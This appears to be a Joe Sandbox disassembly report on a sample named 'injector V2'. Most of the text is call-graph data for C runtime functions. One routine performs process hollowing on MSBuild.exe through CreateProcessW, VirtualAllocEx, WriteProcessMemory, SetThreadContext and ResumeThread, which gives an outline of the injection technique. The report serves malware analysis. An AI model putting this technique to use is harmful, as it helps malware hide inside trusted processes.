__FrameHandler3::FrameUnwindToState 9956->9957 9971 608161 EnterCriticalSection 9957->9971 9959 6071d0 9972 6070b7 9959->9972 9961 6071dd 9976 6071fb 9961->9976 9964 606fef 10001 606fd6 9964->10001 9966 606ff9 9967 60700d 9966->9967 9968 606ffd GetCurrentProcess TerminateProcess 9966->9968 9969 606f54 __CreateFrameInfo 3 API calls 9967->9969 9968->9967 9970 607015 ExitProcess 9969->9970 9971->9959 9975 6070c3 __FrameHandler3::FrameUnwindToState __CreateFrameInfo 9972->9975 9973 607127 __CreateFrameInfo 9973->9961 9975->9973 9979 60776b 9975->9979 10000 608178 LeaveCriticalSection 9976->10000 9978 607096 9978->9945 9978->9964 9980 607777 __EH_prolog3 9979->9980 9983 6079f6 9980->9983 9982 60779e __CreateFrameInfo 9982->9973 9984 607a02 __FrameHandler3::FrameUnwindToState 9983->9984 9991 608161 EnterCriticalSection 9984->9991 9986 607a10 9992 6078c1 9986->9992 9991->9986 9993 6078e0 9992->9993 9994 6078d8 9992->9994 9993->9994 9995 60b0cb __freea 14 API calls 9993->9995 9996 607a45 9994->9996 9995->9994 9999 608178 LeaveCriticalSection 9996->9999 9998 607a2e 9998->9982 9999->9998 10000->9978 10004 60b94f 10001->10004 10003 606fdb __CreateFrameInfo 10003->9966 10005 60b95e __CreateFrameInfo 10004->10005 10006 60b96b 10005->10006 10008 609d53 10005->10008 10006->10003 10009 609e9e __dosmaperr 5 API calls 10008->10009 10010 609d6f 10009->10010 10010->10006 10012 606a7d 10011->10012 10013 606a8f ___scrt_uninitialize_crt 10011->10013 10014 606a8b 10012->10014 10016 60b4a7 10012->10016 10013->8588 10014->8588 10019 60b5d2 10016->10019 10022 60b6ab 10019->10022 10023 60b6b7 __FrameHandler3::FrameUnwindToState 10022->10023 10030 608161 EnterCriticalSection 10023->10030 10025 60b72d 10039 60b74b 10025->10039 10029 60b6c1 ___scrt_uninitialize_crt 10029->10025 10031 60b61f 10029->10031 10030->10029 10032 60b62b __FrameHandler3::FrameUnwindToState 10031->10032 10042 606aef EnterCriticalSection 10032->10042 10034 60b66e 10056 60b69f 10034->10056 10035 60b635 ___scrt_uninitialize_crt 10035->10034 10043 60b4b0 10035->10043 10155 608178 LeaveCriticalSection 10039->10155 10041 60b4ae 10041->10014 10042->10035 10044 60b4c5 __strnicoll 10043->10044 10045 60b4d7 10044->10045 10046 60b4cc 10044->10046 10059 60b515 10045->10059 10048 60b5d2 ___scrt_uninitialize_crt 77 API calls 10046->10048 10050 60b4d2 10048->10050 10051 607fd7 __strnicoll 48 API calls 10050->10051 10053 60b50f 10051->10053 10053->10034 10054 60b4f8 10072 60e11f 10054->10072 10154 606b03 LeaveCriticalSection 10056->10154 10058 60b68d 10058->10029 10060 60b52e 10059->10060 10064 60b4e1 10059->10064 10061 60d936 ___scrt_uninitialize_crt 48 API calls 10060->10061 10060->10064 10062 60b54a 10061->10062 10083 60e45a 10062->10083 10064->10050 10065 60d936 10064->10065 10066 60d942 10065->10066 10067 60d957 10065->10067 10068 60b757 __strnicoll 14 API calls 10066->10068 10067->10054 10069 60d947 10068->10069 10070 607d69 __strnicoll 48 API calls 10069->10070 10071 60d952 10070->10071 10071->10054 10073 60e130 10072->10073 10075 60e13d 10072->10075 10074 60b757 __strnicoll 14 API calls 10073->10074 10082 60e135 10074->10082 10076 60e186 10075->10076 10079 60e164 10075->10079 10077 60b757 __strnicoll 14 API calls 10076->10077 10078 60e18b 10077->10078 10080 607d69 __strnicoll 48 API calls 10078->10080 10124 60e19c 10079->10124 10080->10082 10082->10050 10085 60e466 __FrameHandler3::FrameUnwindToState 10083->10085 10084 60e4a7 10086 607f12 __strnicoll 29 API calls 10084->10086 10085->10084 10087 60e4ed 10085->10087 10093 60e46e 10085->10093 10086->10093 10094 60d8d7 EnterCriticalSection 10087->10094 10089 60e4f3 10090 60e511 10089->10090 10095 60e23e 10089->10095 10121 60e563 10090->10121 10093->10064 10094->10089 10096 60e266 10095->10096 10119 60e289 ___scrt_uninitialize_crt 10095->10119 10097 60e26a 10096->10097 10099 60e2c5 10096->10099 10098 607f12 __strnicoll 29 API calls 10097->10098 10098->10119 10100 60e2e3 10099->10100 10101 60fa51 ___scrt_uninitialize_crt 50 API calls 10099->10101 10102 60e56b ___scrt_uninitialize_crt 49 API calls 10100->10102 10101->10100 10103 60e2f5 10102->10103 10104 60e342 10103->10104 10105 60e2fb 10103->10105 10106 60e356 10104->10106 10107 60e3ab WriteFile 10104->10107 10108 60e303 10105->10108 10109 60e32a 10105->10109 10110 60e397 10106->10110 10111 60e35e 10106->10111 10112 60e3cd GetLastError 10107->10112 10107->10119 10116 60e9af ___scrt_uninitialize_crt 6 API calls 10108->10116 10108->10119 10113 60e5e8 ___scrt_uninitialize_crt 54 API calls 10109->10113 10117 60ea17 ___scrt_uninitialize_crt 7 API calls 10110->10117 10114 60e383 10111->10114 10115 60e363 10111->10115 10112->10119 10113->10119 10118 60ebdb ___scrt_uninitialize_crt 8 API calls 10114->10118 10115->10119 10120 60eaf2 ___scrt_uninitialize_crt 7 API calls 10115->10120 10116->10119 10117->10119 10118->10119 10119->10090 10120->10119 10122 60d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10121->10122 10123 60e569 10122->10123 10123->10093 10125 60e1a8 __FrameHandler3::FrameUnwindToState 10124->10125 10137 60d8d7 EnterCriticalSection 10125->10137 10127 60e1b7 10135 60e1fc 10127->10135 10138 60d68e 10127->10138 10129 60b757 __strnicoll 14 API calls 10131 60e203 10129->10131 10130 60e1e3 FlushFileBuffers 10130->10131 10132 60e1ef GetLastError 10130->10132 10151 60e232 10131->10151 10133 60b76a __dosmaperr 14 API calls 10132->10133 10133->10135 10135->10129 10137->10127 10139 60d69b 10138->10139 10141 60d6b0 10138->10141 10140 60b76a __dosmaperr 14 API calls 10139->10140 10142 60d6a0 10140->10142 10143 60b76a __dosmaperr 14 API calls 10141->10143 10145 60d6d5 10141->10145 10144 60b757 __strnicoll 14 API calls 10142->10144 10146 60d6e0 10143->10146 10148 60d6a8 10144->10148 10145->10130 10147 60b757 __strnicoll 14 API calls 10146->10147 10149 60d6e8 10147->10149 10148->10130 10150 607d69 __strnicoll 48 API calls 10149->10150 10150->10148 10152 60d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10151->10152 10153 60e21b 10152->10153 10153->10082 10154->10058 10155->10041 11001 60a5f0 11002 60a5fc __FrameHandler3::FrameUnwindToState 11001->11002 11013 608161 EnterCriticalSection 11002->11013 11004 60a603 11014 60d839 11004->11014 11011 60a732 2 API calls 11012 60a621 11011->11012 11033 60a647 11012->11033 11013->11004 11015 60d845 __FrameHandler3::FrameUnwindToState 11014->11015 11016 60d84e 11015->11016 11017 60d86f 11015->11017 11018 60b757 __strnicoll 14 API calls 11016->11018 11036 608161 EnterCriticalSection 11017->11036 11020 60d853 11018->11020 11021 607d69 __strnicoll 48 API calls 11020->11021 11022 60a612 11021->11022 11022->11012 11027 60a67c GetStartupInfoW 11022->11027 11023 60d8a7 11044 60d8ce 11023->11044 11025 60d87b 11025->11023 11037 60d789 11025->11037 11028 60a699 11027->11028 11030 60a61c 11027->11030 11029 60d839 49 API calls 11028->11029 11028->11030 11032 60a6c1 11029->11032 11030->11011 11031 60a6f1 GetFileType 11031->11032 11032->11030 11032->11031 11048 608178 LeaveCriticalSection 11033->11048 11035 60a632 11036->11025 11038 60b807 __dosmaperr 14 API calls 11037->11038 11039 60d79b 11038->11039 11042 609c11 6 API calls 11039->11042 11043 60d7a8 11039->11043 11040 60b0cb __freea 14 API calls 11041 60d7fd 11040->11041 11041->11025 11042->11039 11043->11040 11047 608178 LeaveCriticalSection 11044->11047 11046 60d8d5 11046->11022 11047->11046 11048->11035 11058 606bf0 11059 60b4a7 ___scrt_uninitialize_crt 77 API calls 11058->11059 11060 606bf8 11059->11060 11068 60b864 11060->11068 11062 606bfd 11078 60b90f 11062->11078 11065 606c27 11066 60b0cb __freea 14 API calls 11065->11066 11067 606c32 11066->11067 11069 60b870 __FrameHandler3::FrameUnwindToState 11068->11069 11082 608161 EnterCriticalSection 11069->11082 11071 60b8e7 11089 60b906 11071->11089 11073 60b87b 11073->11071 11075 60b8bb DeleteCriticalSection 11073->11075 11083 60ed63 11073->11083 11076 60b0cb __freea 14 API calls 11075->11076 11076->11073 11079 60b926 11078->11079 11080 606c0c DeleteCriticalSection 11078->11080 11079->11080 11081 60b0cb __freea 14 API calls 11079->11081 11080->11062 11080->11065 11081->11080 11082->11073 11084 60ed76 __strnicoll 11083->11084 11092 60ee21 11084->11092 11086 60ed82 11087 607fd7 __strnicoll 48 API calls 11086->11087 11088 60ed8e 11087->11088 11088->11073 11164 608178 LeaveCriticalSection 11089->11164 11091 60b8f3 11091->11062 11093 60ee2d __FrameHandler3::FrameUnwindToState 11092->11093 11094 60ee37 11093->11094 11095 60ee5a 11093->11095 11096 607f12 __strnicoll 29 API calls 11094->11096 11102 60ee52 11095->11102 11103 606aef EnterCriticalSection 11095->11103 11096->11102 11098 60ee78 11104 60ed93 11098->11104 11100 60ee85 11118 60eeb0 11100->11118 11102->11086 11103->11098 11105 60eda0 11104->11105 11106 60edc3 11104->11106 11107 607f12 __strnicoll 29 API calls 11105->11107 11108 60b515 ___scrt_uninitialize_crt 73 API calls 11106->11108 11116 60edbb 11106->11116 11107->11116 11109 60eddb 11108->11109 11110 60b90f 14 API calls 11109->11110 11111 60ede3 11110->11111 11112 60d936 ___scrt_uninitialize_crt 48 API calls 11111->11112 11113 60edef 11112->11113 11121 61001b 11113->11121 11116->11100 11117 60b0cb __freea 14 API calls 11117->11116 11163 606b03 LeaveCriticalSection 11118->11163 11120 60eeb6 11120->11102 11122 610044 11121->11122 11127 60edf6 11121->11127 11123 610093 11122->11123 11125 61006b 11122->11125 11124 607f12 __strnicoll 29 API calls 11123->11124 11124->11127 11128 6100be 11125->11128 11127->11116 11127->11117 11129 6100ca __FrameHandler3::FrameUnwindToState 11128->11129 11136 60d8d7 EnterCriticalSection 11129->11136 11131 6100d8 11132 610109 11131->11132 11137 60ff7b 11131->11137 11150 610143 11132->11150 11136->11131 11138 60d68e ___scrt_uninitialize_crt 48 API calls 11137->11138 11141 60ff8b 11138->11141 11139 60ff91 11153 60d6f8 11139->11153 11141->11139 11142 60d68e ___scrt_uninitialize_crt 48 API calls 11141->11142 11149 60ffc3 11141->11149 11144 60ffba 11142->11144 11143 60d68e ___scrt_uninitialize_crt 48 API calls 11145 60ffcf CloseHandle 11143->11145 11147 60d68e ___scrt_uninitialize_crt 48 API calls 11144->11147 11145->11139 11148 60ffdb GetLastError 11145->11148 11146 60ffe9 ___scrt_uninitialize_crt 11146->11132 11147->11149 11148->11139 11149->11139 11149->11143 11162 60d8fa LeaveCriticalSection 11150->11162 11152 61012c 11152->11127 11154 60d76e 11153->11154 11156 60d707 11153->11156 11155 60b757 __strnicoll 14 API calls 11154->11155 11157 60d773 11155->11157 11156->11154 11161 60d731 11156->11161 11158 60b76a __dosmaperr 14 API calls 11157->11158 11159 60d75e 11158->11159 11159->11146 11160 60d758 SetStdHandle 11160->11159 11161->11159 11161->11160 11162->11152 11163->11120 11164->11091 10156 60bc45 10157 60bc83 10156->10157 10161 60bc53 __dosmaperr 10156->10161 10159 60b757 __strnicoll 14 API calls 10157->10159 10158 60bc6e RtlAllocateHeap 10160 60bc81 10158->10160 10158->10161 10159->10160 10161->10157 10161->10158 10162 607207 __dosmaperr 2 API calls 10161->10162 10162->10161 10174 5fbe70 10175 5fbe9b 10174->10175 10176 606ed5 21 API calls 10175->10176 10177 5fbeaf 10176->10177 11357 60aca2 11360 608178 LeaveCriticalSection 11357->11360 11359 60aca9 11360->11359 10163 6083ac 10164 60b0cb __freea 14 API calls 10163->10164 10165 6083c4 10164->10165 11387 60a2b0 11388 60a2bb 11387->11388 11389 60a2cb 11387->11389 11393 60a3b5 11388->11393 11392 60b0cb __freea 14 API calls 11392->11389 11394 60a3ca 11393->11394 11397 60a3d0 11393->11397 11395 60b0cb __freea 14 API calls 11394->11395 11395->11397 11396 60b0cb __freea 14 API calls 11398 60a3dc 11396->11398 11397->11396 11399 60b0cb __freea 14 API calls 11398->11399 11400 60a3e7 11399->11400 11401 60b0cb __freea 14 API calls 11400->11401 11402 60a3f2 11401->11402 11403 60b0cb __freea 14 API calls 11402->11403 11404 60a3fd 11403->11404 11405 60b0cb __freea 14 API calls 11404->11405 11406 60a408 11405->11406 11407 60b0cb __freea 14 API calls 11406->11407 11408 60a413 11407->11408 11409 60b0cb __freea 14 API calls 11408->11409 11410 60a41e 11409->11410 11411 60b0cb __freea 14 API calls 11410->11411 11412 60a429 11411->11412 11413 60b0cb __freea 14 API calls 11412->11413 11414 60a437 11413->11414 11419 60a52e 11414->11419 11420 60a53a __FrameHandler3::FrameUnwindToState 11419->11420 11435 608161 EnterCriticalSection 11420->11435 11423 60a544 11425 60b0cb __freea 14 API calls 11423->11425 11426 60a56e 11423->11426 11425->11426 11436 60a58d 11426->11436 11427 60a599 11428 60a5a5 __FrameHandler3::FrameUnwindToState 11427->11428 11440 608161 EnterCriticalSection 11428->11440 11430 60a5af 11431 60a2d1 __dosmaperr 14 API calls 11430->11431 11432 60a5c2 11431->11432 11441 60a5e2 11432->11441 11435->11423 11439 608178 LeaveCriticalSection 11436->11439 11438 60a45d 11438->11427 11439->11438 11440->11430 11444 608178 LeaveCriticalSection 11441->11444 11443 60a2c3 11443->11392 11444->11443 10166 61b18d 10167 61b1c3 10166->10167 10168 61b310 GetPEB 10167->10168 10169 61b322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 10167->10169 10168->10169 10169->10167 10170 61b3c9 WriteProcessMemory 10169->10170 10171 61b40e 10170->10171 10172 61b450 WriteProcessMemory Wow64SetThreadContext ResumeThread 10171->10172 10173 61b413 WriteProcessMemory 10171->10173 10173->10171 10579 607310 10582 607337 10579->10582 10583 607343 __FrameHandler3::FrameUnwindToState 10582->10583 10590 608161 EnterCriticalSection 10583->10590 10585 60737b 10591 607399 10585->10591 10586 60734d 10586->10585 10589 60c1fa __strnicoll 14 API calls 10586->10589 10589->10586 10590->10586 10594 608178 LeaveCriticalSection 10591->10594 10593 607335 10594->10593 10595 605610 10596 605618 10595->10596 10614 6082ea 10596->10614 10598 605623 10621 6050f0 10598->10621 10600 605695 10601 605444 4 API calls 10600->10601 10613 6056b2 10600->10613 10602 6056ba 10601->10602 10603 605638 __RTC_Initialize 10603->10600 10627 604f6a 10603->10627 10605 605651 10630 6073a5 10605->10630 10609 605667 10661 605933 10609->10661 10611 60568a 10667 6072a4 10611->10667 10615 6082f9 10614->10615 10616 60831c 10614->10616 10615->10616 10617 60b757 __strnicoll 14 API calls 10615->10617 10616->10598 10618 60830c 10617->10618 10619 607d69 __strnicoll 48 API calls 10618->10619 10620 608317 10619->10620 10620->10598 10622 605100 10621->10622 10623 6050fc 10621->10623 10624 605444 4 API calls 10622->10624 10626 60510d ___scrt_release_startup_lock 10622->10626 10623->10603 10625 605176 10624->10625 10626->10603 10674 604f7f 10627->10674 10631 6073ff 10630->10631 10632 607437 10631->10632 10634 607421 10631->10634 10641 60565c 10631->10641 10633 60a880 58 API calls 10632->10633 10635 60743d 10633->10635 10636 60b757 __strnicoll 14 API calls 10634->10636 10709 60ca78 GetModuleFileNameW 10635->10709 10638 607426 10636->10638 10640 607d69 __strnicoll 48 API calls 10638->10640 10640->10641 10641->10600 10660 605918 InitializeSListHead 10641->10660 10646 6074a5 10648 60753c 48 API calls 10646->10648 10647 607499 10649 60b757 __strnicoll 14 API calls 10647->10649 10650 6074bb 10648->10650 10651 60749e 10649->10651 10650->10651 10652 6074df 10650->10652 10653 60b0cb __freea 14 API calls 10651->10653 10654 607500 10652->10654 10655 6074f6 10652->10655 10653->10641 10658 60b0cb __freea 14 API calls 10654->10658 10656 60b0cb __freea 14 API calls 10655->10656 10657 6074fe 10656->10657 10659 60b0cb __freea 14 API calls 10657->10659 10658->10657 10659->10641 10660->10609 10765 6076b0 10661->10765 10663 605944 10664 60594b 10663->10664 10665 605444 4 API calls 10663->10665 10664->10611 10666 605953 10665->10666 10668 60a00a _unexpected 48 API calls 10667->10668 10669 6072af 10668->10669 10670 60b757 __strnicoll 14 API calls 10669->10670 10673 6072e7 10669->10673 10671 6072dc 10670->10671 10672 607d69 __strnicoll 48 API calls 10671->10672 10672->10673 10673->10600 10675 604f95 10674->10675 10676 604f8e 10674->10676 10683 607738 10675->10683 10680 6077a9 10676->10680 10679 604f75 10679->10605 10681 607738 51 API calls 10680->10681 10682 6077bb 10681->10682 10682->10679 10686 60799b 10683->10686 10687 6079a7 __FrameHandler3::FrameUnwindToState 10686->10687 10694 608161 EnterCriticalSection 10687->10694 10689 6079b5 10695 6077bf 10689->10695 10691 6079c2 10705 6079ea 10691->10705 10694->10689 10696 6077da 10695->10696 10697 60784d __dosmaperr 10695->10697 10696->10697 10699 60d0c4 51 API calls 10696->10699 10704 60782d 10696->10704 10697->10691 10698 60d0c4 51 API calls 10700 607843 10698->10700 10701 607823 10699->10701 10702 60b0cb __freea 14 API calls 10700->10702 10703 60b0cb __freea 14 API calls 10701->10703 10702->10697 10703->10704 10704->10697 10704->10698 10708 608178 LeaveCriticalSection 10705->10708 10707 607769 10707->10679 10708->10707 10710 60caa7 GetLastError 10709->10710 10711 60cab8 10709->10711 10712 60b77d __dosmaperr 14 API calls 10710->10712 10713 60c274 48 API calls 10711->10713 10715 60cab3 10712->10715 10714 60cae9 10713->10714 10731 60cb54 10714->10731 10717 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 10715->10717 10718 607450 10717->10718 10719 60753c 10718->10719 10720 607562 10719->10720 10723 6075c0 10720->10723 10759 60cc16 10720->10759 10722 607483 10725 6073b0 10722->10725 10723->10722 10724 60cc16 48 API calls 10723->10724 10724->10723 10726 6073c1 10725->10726 10730 6073f3 10725->10730 10727 60b807 __dosmaperr 14 API calls 10726->10727 10726->10730 10728 6073ea 10727->10728 10729 60b0cb __freea 14 API calls 10728->10729 10729->10730 10730->10646 10730->10647 10732 60cb70 10731->10732 10748 60cb61 10731->10748 10733 60cb78 10732->10733 10734 60cb9d 10732->10734 10733->10748 10752 60cb19 10733->10752 10735 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 10734->10735 10737 60cbad 10735->10737 10738 60cbb4 GetLastError 10737->10738 10739 60cbca 10737->10739 10740 60b77d __dosmaperr 14 API calls 10738->10740 10741 60cbdb 10739->10741 10742 60cb19 14 API calls 10739->10742 10744 60cbc0 10740->10744 10741->10748 10756 60c594 10741->10756 10742->10741 10746 60b757 __strnicoll 14 API calls 10744->10746 10746->10748 10747 60cbf5 GetLastError 10749 60b77d __dosmaperr 14 API calls 10747->10749 10748->10715 10750 60cc01 10749->10750 10751 60b757 __strnicoll 14 API calls 10750->10751 10751->10748 10753 60cb24 10752->10753 10754 60b757 __strnicoll 14 API calls 10753->10754 10755 60cb2d 10754->10755 10755->10748 10757 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 10756->10757 10758 60c5b1 10757->10758 10758->10747 10758->10748 10762 60cc2e 10759->10762 10763 60a8c8 __strnicoll 48 API calls 10762->10763 10764 60cc29 10763->10764 10764->10720 10766 6076ce 10765->10766 10770 6076ee 10765->10770 10767 60b757 __strnicoll 14 API calls 10766->10767 10768 6076e4 10767->10768 10769 607d69 __strnicoll 48 API calls 10768->10769 10769->10770 10770->10663

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0061B0FF,0061B0EF), ref: 0061B323
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0061B336
                                                                          • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0061B354
                                                                          • ReadProcessMemory.KERNELBASE(00000098,?,0061B143,00000004,00000000), ref: 0061B378
                                                                          • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 0061B3A3
                                                                          • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 0061B3FB
                                                                          • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 0061B446
                                                                          • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 0061B484
                                                                          • Wow64SetThreadContext.KERNEL32(0000009C,005E0000), ref: 0061B4C0
                                                                          • ResumeThread.KERNELBASE(0000009C), ref: 0061B4CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                          • API String ID: 2687962208-3857624555
                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                          • Instruction ID: 62e7c071e4026d446abc074c7b52a9f44068ed917d5621c8140af02c49819bd7
                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                          • Instruction Fuzzy Hash: C3B1F87660064AAFDB60CF68CC80BDA73A5FF88714F198524EA1CAB341D774FA51CB94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed95a7a43b6a73312b74311182ddabfbf29d459905ebf082e876639bc1bca847
                                                                          • Instruction ID: 4351051820e42e3dd22d43da20dd84e32ae3e644fe102efffbbca6bf1974e808
                                                                          • Opcode Fuzzy Hash: ed95a7a43b6a73312b74311182ddabfbf29d459905ebf082e876639bc1bca847
                                                                          • Instruction Fuzzy Hash: 0B011974A0420C8FC754DF68C885AD9FBF0EB18710F0484ADA88897340EB74AA84CF85

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 26 609dd3-609ddf 27 609e71-609e74 26->27 28 609de4-609df5 27->28 29 609e7a 27->29 31 609e02-609e1b LoadLibraryExW 28->31 32 609df7-609dfa 28->32 30 609e7c-609e80 29->30 35 609e81-609e91 31->35 36 609e1d-609e26 GetLastError 31->36 33 609e00 32->33 34 609e9a-609e9c 32->34 38 609e6e 33->38 34->30 35->34 37 609e93-609e94 FreeLibrary 35->37 39 609e28-609e3a call 60bc93 36->39 40 609e5f-609e6c 36->40 37->34 38->27 39->40 43 609e3c-609e4e call 60bc93 39->43 40->38 43->40 46 609e50-609e5d LoadLibraryExW 43->46 46->35 46->40
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F8F81887,?,00609EE2,?,?,00000000), ref: 00609E94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3664257935-537541572
                                                                          • Opcode ID: a0b570e60c3da1a6054b55c6a7a6ffbf0325d7fcb3880e1d2b920ddcc840efd8
                                                                          • Instruction ID: 9a9ac5b7aca641b2095760e47fc584812a4cc0cb874b773b8e8fe5af7514b386
                                                                          • Opcode Fuzzy Hash: a0b570e60c3da1a6054b55c6a7a6ffbf0325d7fcb3880e1d2b920ddcc840efd8
                                                                          • Instruction Fuzzy Hash: 8421D531A80211ABD725DB60DC45ADB775BEF81B70B295121ED06A73E2DB30ED02C6F0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 47 5fbeb0-5fbf22 CreateFileA 48 5fbf29-5fbf37 47->48 49 5fbf3d-5fbf4a 48->49 50 5fbff2-5fc00c 48->50 53 5fc021-5fc054 GetFileSize 49->53 54 5fbf50-5fbf5d 49->54 52 5fc16a 50->52 52->48 53->52 56 5fc078-5fc0ce call 604233 ReadFile 54->56 57 5fbf63-5fbf70 54->57 56->52 61 5fbf76-5fbf83 57->61 62 5fc011-5fc01c 57->62 64 5fc12c-5fc146 CloseHandle 61->64 65 5fbf89-5fbf96 61->65 62->52 64->52 67 5fbf9c-5fbfa9 65->67 68 5fc0f6-5fc108 call 60423c 65->68 71 5fbfaf-5fbfbc 67->71 72 5fc0d3-5fc0f1 67->72 68->52 75 5fc059-5fc073 CloseHandle 71->75 76 5fbfc2-5fbfcf 71->76 72->52 75->52 78 5fc14b-5fc169 call 604241 76->78 79 5fbfd5-5fbfe2 76->79 82 5fc10d-5fc127 CloseHandle 79->82 83 5fbfe8-5fbfed 79->83 82->52 83->52
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 41414c17aeffbca1c01d73ae9c9b0ae9c25ce7270b14b4450319d8f31b36ddd5
                                                                          • Instruction ID: 39d0ce560d141fbab5cdd819bd48840ded4e5639cb042074cd29ec205f54d69a
                                                                          • Opcode Fuzzy Hash: 41414c17aeffbca1c01d73ae9c9b0ae9c25ce7270b14b4450319d8f31b36ddd5
                                                                          • Instruction Fuzzy Hash: F97136B490420DDFDB04DFA8D5586AEBFF0FB48700F10892AE956AB350DB389945DF52

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 00606D2F
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,00603BEA), ref: 00606D3B
                                                                          • __dosmaperr.LIBCMT ref: 00606D42
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
